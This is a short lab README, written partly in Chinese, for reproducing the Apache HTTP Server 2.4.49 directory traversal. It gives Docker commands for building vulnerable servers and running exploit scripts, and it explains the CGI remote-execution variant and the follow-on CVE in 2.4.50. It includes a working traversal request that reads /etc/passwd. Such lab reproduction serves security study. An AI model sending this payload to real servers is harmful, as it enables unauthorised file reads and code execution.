docker-compose up -d --build vuln-server-no-cgid
python no-cgid/exploit.py
docker-compose up -d --build vuln-server-cgid-sh
python cgid-sh/exploit.py
Apache HTTP Server 2.4.49 的目录遍历漏洞。当未设置 Require all denied 时发生。
当收到以 %2e 编码的 URL 时,允许访问上级目录。 示例: GET /cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
如果启用了 CGI,则可实现 RCE。
由于对此漏洞的修复不充分,存在 Apache HTTP Server 2.4.50 的漏洞 CVE-2021-42013。